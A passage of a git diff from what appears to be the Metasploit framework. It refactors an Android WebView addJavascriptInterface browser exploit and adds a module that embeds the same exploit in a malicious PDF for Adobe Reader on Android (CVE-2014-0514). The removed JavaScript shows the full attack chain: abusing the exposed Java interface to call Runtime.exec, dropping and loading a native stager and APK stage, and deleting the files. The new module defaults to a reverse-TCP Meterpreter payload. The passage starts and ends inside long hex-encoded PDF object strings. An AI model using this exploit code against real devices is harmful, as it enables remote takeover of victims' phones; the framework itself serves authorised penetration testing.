"\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2d\x42\x6f\x6c\x64\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x42\x6f\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(47, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x6c\x76\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(48, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x5a\x61\x70\x66\x44\x69\x6e\x67\x62\x61\x74\x73\x2f\x4e\x61\x6d\x65\x2f\x5a\x61\x44\x62\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(45, "\xd\x3c\x3c\x2f\x44\x69\x66\x66\x65\x72\x65\x6e\x63\x65\x73\x5b\x32\x34\x2f\x62\x72\x65\x76\x65\x2f\x63\x61\x72\x6f\x6e\x2f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x64\x6f\x74\x61\x63\x63\x65\x6e\x74\x2f\x68\x75\x6e\x67\x61\x72\x75\x6d\x6c\x61\x75\x74\x2f\x6f\x67\x6f\x6e\x65\x6b\x2f\x72\x69\x6e\x67\x2f\x74\x69\x6c\x64\x65\x20\x33\x39\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x65\x20\x39\x36\x2f\x67\x72\x61\x76\x65\x20\x31\x32\x38\x2f\x62\x75\x6c\x6c\x65\x74\x2f\x64\x61\x67\x67\x65\x72\x2f\x64\x61\x67\x67\x65\x72\x64\x62\x6c\x2f\x65\x6c\x6c\x69\x70\x73\x69\x73\x2f\x65\x6d\x64\x61\x73\x68\x2f\x65\x6e\x64\x61\x73\x68\x2f\x66\x6c\x6f\x72\x69\x6e\x2f\x66\x72\x61\x63\x74\x69\x6f\x6e\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x6c\x65\x66\x74\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x72\x69\x67\x68\x74\x2f\x6d\x69\x6e\x75\x73\x2f\x70\x65\x72\x74\x68\x6f\x75\x73\x61\x6e\x64\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x62\x61\x73\x65\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x62\x61\x73\x65\x2f\x74\x72\x61\x64\x65\x6d\x61\x72\x6b\x2f\x66\x69\x2f\x66\x6c\x2f\x4c\x73\x6c\x61\x73\x68\x2f\x4f\x45\x2f\x53\x63\x61\x72\x6f\x6e\x2f\x59\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x5a\x63\x61\x72\x6f\x6e\x2f\x64\x6f\x74\x6c\x65\x73\x73\x69\x2f\x6c\x73\x6c\x61\x73\x68\x2f\x6f\x65\x2f\x73\x63\x61\x72\x6f\x6e\x2f\x7a\x63\x61\x72\x6f\x6e\x20\x31\x36\x30\x2f\x45\x75\x72\x6f\x20\x31\x36\x34\x2f\x63\x75\x72\x72\x65\x6e\x63\x79\x20\x31\x36\x36\x2f\x62\x72\x6f\x6b\x65\x6e\x62\x61\x72\x20\x31\x36\x38\x2f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x2f\x6f\x72\x64\x66\x65\x6d\x69\x6e\x69\x6e\x65\x20\x31\x37\x32\x2f\x6c\x6f\x67\x69\x63\x61\x6c\x6e\x6f\x74\x2f\x2e\x6e\x6f\x74\x64\x65\x66\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x2f\x6d\x61\x63\x72\x6f\x6e\x2f\x64\x65\x67\x72\x65\x65\x2f\x70\x6c\x75\x73\x6d\x69\x6e\x75\x73\x2f\x74\x77\x6f\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x74\x68\x72\x65\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x61\x63\x75\x74\x65\x2f\x6d\x75\x20\x31\x38\x33\x2f\x70\x65\x72\x69\x6f\x64\x63\x65\x6e\x74\x65\x72\x65\x64\x2f\x63\x65\x64\x69\x6c\x6c\x61\x2f\x6f\x6e\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x6f\x72\x64\x6d\x61\x73\x63\x75\x6c\x69\x6e\x65\x20\x31\x38\x38\x2f\x6f\x6e\x65\x71\x75\x61\x72\x74\x65\x72\x2f\x6f\x6e\x65\x68\x61\x6c\x66\x2f\x74\x68\x72\x65\x65\x71\x75\x61\x72\x74\x65\x72\x73\x20\x31\x39\x32\x2f\x41\x67\x72\x61\x76\x65\x2f\x41\x61\x63\x75\x74\x65\x2f\x41\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x41\x74\x69\x6c\x64\x65\x2f\x41\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x41\x72\x69\x6e\x67\x2f\x41\x45\x2f\x43\x63\x65\x64\x69\x6c\x6c\x61\x2f\x45\x67\x72\x61\x76\x65\x2f\x45\x61\x63\x75\x74\x65\x2f\x45\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x45\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x49\x67\x72\x61\x76\x65\x2f\x49\x61\x63\x75\x74\x65\x2f\x49\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x49\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x45\x74\x68\x2f\x4e\x74\x69\x6c\x64\x65\x2f\x4f\x67\x72\x61\x76\x65\x2f\x4f\x61\x63\x75\x74\x65\x2f\x4f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x4f\x74\x69\x6c\x64\x65\x2f\x4f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2f\x4f\x73\x6c\x61\x73\x68\x2f\x55\x67\x72\x61\x76\x65\x2f\x55\x61\x63\x75\x74\x65\x2f\x55\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x55\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x59\x61\x63\x75\x74\x65\x2f\x54\x68\x6f\x72\x6e\x2f\x67\x65\x72\x6d\x61\x6e\x64\x62\x6c\x73\x2f\x61\x67\x72\x61\x76\x65\x2f\x61\x61\x63\x75\x74\x65\x2f\x61\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x61\x74\x69\x6c\x64\x65\x2f\x61\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x61\x72\x69\x6e\x67\x2f\x61\x65\x2f\x63\x63\x65\x64\x69\x6c\x6c\x61\x2f\x65\x67\x72\x61\x76\x65\x2f\x65\x61\x63\x75\x74\x65\x2f\x65\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x65\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x69\x67\x72\x61\x76\x65\x2f\x69\x61\x63\x75\x74\x65\x2f\x69\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x69\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x65\x74\x68\x2f\x6e\x74\x69\x6c\x64\x65\x2f\x6f\x67\x72\x61\x76\x65\x2f\x6f\x61\x63\x75\x74\x65\x2f\x6f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x6f\x74\x69\x6c\x64\x65\x2f\x6f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x64\x69\x76\x69\x64\x65\x2f\x6f\x73\x6c\x61\x73\x68\x2f\x75\x67\x72\x61\x76\x65\x2f\x75\x61\x63\x75\x74\x65\x2f\x75\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x75\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x79\x61\x63\x75\x74\x65\x2f\x74\x68\x6f\x72\x6e\x2f\x79\x64\x69\x65\x72\x65\x73\x69\x73\x5d\x2f\x54\x79\x70\x65\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3e\x3e\xd") + add_object(23, "\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") + + @xref_offset = @pdf.length + @pdf << xref_table << trailer(25, eol) << startxref + + @pdf + end end end diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 373fc8f2fd..ea26cc19f8 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -4,25 +4,13 @@ ## require 'msf/core' +require 'msf/core/exploit/android' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn - - # Since the NDK stager is used, arch detection must be performed - SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ] - - # Most android devices are ARM - DEFAULT_ARCH = ARCH_ARMLE - - # Some of the default NDK build targets are named differently than - # msf's builtin constants. This mapping allows the ndkstager file - # to be looked up from the msf constant. - NDK_FILES = { - ARCH_ARMLE => 'armeabi', - ARCH_MIPSLE => 'mips' - } + include Msf::Exploit::Android autopwn_info( :os_flavor => 'Android', @@ -105,84 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html(arch)) end - # The NDK stager is used to launch a hidden APK - def ndkstager(stagename, arch) - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so') - data = File.read(localfile, :mode => 'rb') - data.gsub!('PLOAD', stagename) - end - - def js(arch) - stagename = Rex::Text.rand_text_alpha(5) - script = %Q| - function exec(runtime, cmdArr) { - var ch = 0; - var output = ''; - var process = runtime.exec(cmdArr); - var input = process.getInputStream(); - - while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); } - return output; - } - - function attemptExploit(obj) { - // ensure that the object contains a native interface - try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } - - // get the pid - var pid = obj.getClass() - .forName('android.os.Process') - .getMethod('myPid', null) - .invoke(null, null); - - // get the runtime so we can exec - var runtime = obj.getClass() - .forName('java.lang.Runtime') - .getMethod('getRuntime', null) - .invoke(null, null); - - // libraryData contains the bytes for a native shared object built via NDK - // which will load the "stage", which in this case is our android meterpreter stager. - // LibraryData is loaded via ajax later, because we have to access javascript in - // order to detect what arch we are running. - var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}"; - - // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains - // another stager which loads android meterpreter from the msf handler. - var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}"; - - // get the process name, which will give us our data path - // $PPID does not seem to work on android 4.0, so we concat pids manually - var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); - - var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; - var stagePath = path + '/#{stagename}.apk'; - - // build the library and chmod it - runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor(); - runtime.exec(['chmod', '700', libraryPath]).waitFor(); - - // build the stage, chmod it, and load it - runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor(); - runtime.exec(['chmod', '700', stagePath]).waitFor(); - - // load the library (this fails in x86, figure out why) - runtime.load(libraryPath); - - // delete dropped files - runtime.exec(['rm', stagePath]).waitFor(); - runtime.exec(['rm', libraryPath]).waitFor(); - - return true; - } - - for (i in top) { if (attemptExploit(top[i]) === true) break; } - | - - # remove comments and empty lines - script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '') - end - # Called when a client requests a .js route. # This is handy for post-XSS. def serve_static_js(cli, req) @@ -191,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote if arch.present? print_status("Serving javascript for arch #{normalize_arch arch}") - send_response(cli, js(normalize_arch arch), response_opts) + send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts) else print_status("Serving arch detection javascript") send_response(cli, static_arch_detect_js, response_opts) diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb new file mode 100644 index 0000000000..9f1dd2c4c1 --- /dev/null +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -0,0 +1,127 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/fileformat' +require 'msf/core/exploit/pdf' +require 'msf/core/exploit/android' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::PDF + include Msf::Exploit::Android + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe Reader for Android addJavascriptInterface Exploit', + 'Description' => %q{ + Adobe Reader < 11.2.0 exposed insecure native interfaces to untrusted + javascript in a PDF. This embeds the browser exploit from android/ + webview_addjavascriptinterface into a PDF to get a shell. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Yorick Koster', # discoverer + 'joev' # msf module + ], + 'References' => + [ + [ 'CVE', '2014-0514' ], + [ 'EDB', '32884' ], + [ 'OSVDB', '105781' ], + ], + 'Platform' => 'android', + 'DefaultOptions' => { + 'PAYLOAD' => 'android/meterpreter/reverse_tcp' + }, + 'Targets' => [ + [ 'Android ARM', { + 'Platform' => 'android', + 'Arch' => ARCH_ARMLE + } + ], + [ 'Android MIPSLE', { + 'Platform' => 'android', + 'Arch' => ARCH_MIPSLE + } + ], + [ 'Android X86', { + 'Platform' => 'android', + 'Arch' => ARCH_X86 + } + ] + ], + 'DisclosureDate' => 'Dec 21 2012', + 'DefaultTarget' => 0 + )) + + register_options([ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ], self.class) + end + + def exploit + print_status("Generating Javascript exploit...") + js = add_javascript_interface_exploit_js(ARCH_ARMLE) + print_status("Creating PDF...") + file_create(pdf(js)) + end + + def pdf(js) + @eol = "\x0d" + @xref = {} + @pdf = header('1.6') + + add_object(25, "\xd\x3c\x3c\x2f\x41\x63\x72\x6f\x46\x6f\x72\x6d\x20\x34\x30\x20\x30\x20\x52\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x20\x33\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x73\x20\x33\x32\x20\x30\x20\x52\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x37\x20\x30\x20\x52\x2f\x50\x61\x67\x65\x73\x20\x31\x36\x20\x30\x20\x52\x2f\x53\x70\x69\x64\x65\x72\x49\x6e\x66\x6f\x20\x32\x32\x20\x30\x20\x52\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x20\x31\x30\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x43\x61\x74\x61\x6c\x6f\x67\x3e\x3e\xd") + add_object(40, "\xd\x3c\x3c\x2f\x44\x41\x28\x2f\x48\x65\x6c\x76\x20\x30\x20\x54\x66\x20\x30\x20\x67\x20\x29\x2f\x44\x52\x3c\x3c\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3c\x3c\x2f\x50\x44\x46\x44\x6f\x63\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x3e\x3e\x2f\x46\x6f\x6e\x74\x3c\x3c\x2f\x48\x65\x42\x6f\x20\x33\x39\x20\x30\x20\x52\x2f\x48\x65\x6c\x76\x20\x34\x37\x20\x30\x20\x52\x2f\x5a\x61\x44\x62\x20\x34\x38\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x46\x69\x65\x6c\x64\x73\x5b\x33\x38\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(3, "\xd\x3c\x3c\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x33\x31\x33\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x58\x4d\x4c\x2f\x54\x79\x70\x65\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x62\x65\x67\x69\x6e\x3d\x22\xef\xbb\xbf\x22\x20\x69\x64\x3d\x22\x57\x35\x4d\x30\x4d\x70\x43\x65\x68\x69\x48\x7a\x72\x65\x53\x7a\x4e\x54\x63\x7a\x6b\x63\x39\x64\x22\x3f\x3e\xd\x3c\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x3d\x22\x61\x64\x6f\x62\x65\x3a\x6e\x73\x3a\x6d\x65\x74\x61\x2f\x22\x20\x78\x3a\x78\x6d\x70\x74\x6b\x3d\x22\x41\x64\x6f\x62\x65\x20\x58\x4d\x50\x20\x43\x6f\x72\x65\x20\x35\x2e\x34\x2d\x63\x30\x30\x35\x20\x37\x38\x2e\x31\x34\x37\x33\x32\x36\x2c\x20\x32\x30\x31\x32\x2f\x30\x38\x2f\x32\x33\x2d\x31\x33\x3a\x30\x33\x3a\x30\x33\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3e\xd\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x4d\x4d\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x6d\x6d\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x70\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x70\x64\x66\x2f\x31\x2e\x33\x2f\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x33\x2d\x33\x31\x54\x31\x33\x3a\x33\x35\x3a\x35\x31\x2b\x30\x32\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x70\x64\x66\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x6c\x69\x20\x78\x6d\x6c\x3a\x6c\x61\x6e\x67\x3d\x22\x78\x2d\x64\x65\x66\x61\x75\x6c\x74\x22\x3e\x6a\x73\x2e\x74\x78\x74\x3c\x2f\x72\x64\x66\x3a\x6c\x69\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\x75\x75\x69\x64\x3a\x39\x64\x38\x35\x36\x39\x65\x65\x2d\x37\x66\x64\x38\x2d\x34\x34\x62\x61\x2d\x39\x63\x38\x63\x2d\x36\x65\x35\x32\x32\x35\x33\x35\x39\x62\x61\x35\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\x75\x75\x69\x64\x3a\x34\x63\x37\x30\x34\x36\x62\x34\x2d\x30\x34\x39\x33\x2d\x39\x30\x34\x62\x2d\x61\x35\x35\x32\x2d\x64\x63\x31\x37\x38\x32\x63\x62\x33\x62\x62\x31\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x3c\x2f\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\xd\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\xd\x3c\x2f\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20